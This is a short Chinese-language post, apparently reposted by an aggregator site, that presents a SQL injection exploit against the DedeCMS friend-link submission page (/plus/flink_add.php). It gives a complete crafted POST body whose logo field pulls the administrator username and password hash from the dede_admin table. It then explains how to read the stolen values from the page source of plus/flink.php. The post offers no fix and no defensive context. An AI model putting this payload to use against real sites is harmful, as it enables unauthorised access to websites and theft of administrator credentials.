DedeCMS另一处全版本通杀SQL注入(无限制)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DedeCMS另一处全版本通杀SQL注入(无限制)相关的知识,希望对你有一定的参考价值。
一:网站要支持申请友链
url:/plus/flink_add.php
=——————————————————–利用开始————————–
直接填写验证码,抓包
修改POST数据
写人exp:
1 |
Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`‘`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`‘` |
2 |
&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\ |
validate为验证码,修改提交即可
再打开友情链接
url:plus/flink.php
有个无法显示的图片,查看源码.ok
以上是关于DedeCMS另一处全版本通杀SQL注入(无限制)的主要内容,如果未能解决你的问题,请参考以下文章